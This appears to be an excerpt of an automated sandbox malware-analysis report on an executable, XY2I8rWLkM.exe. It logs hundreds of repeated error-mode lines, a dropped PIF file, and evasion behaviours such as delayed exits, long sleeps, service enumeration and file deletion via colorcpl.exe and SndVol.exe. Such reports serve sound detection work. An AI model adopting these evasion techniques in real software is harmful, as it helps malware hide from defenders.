                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466F7A7 Sleep,ExitProcess,5_2_0466F7A7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63F7A7 Sleep,ExitProcess,8_2_1C63F7A7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0467A748
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_1C64A748
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 6723Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 2913Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1753Jump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5508Thread sleep time: -74500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4040Thread sleep time: -20169000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4040Thread sleep time: -8739000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58CC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669665
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669253
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0467C291
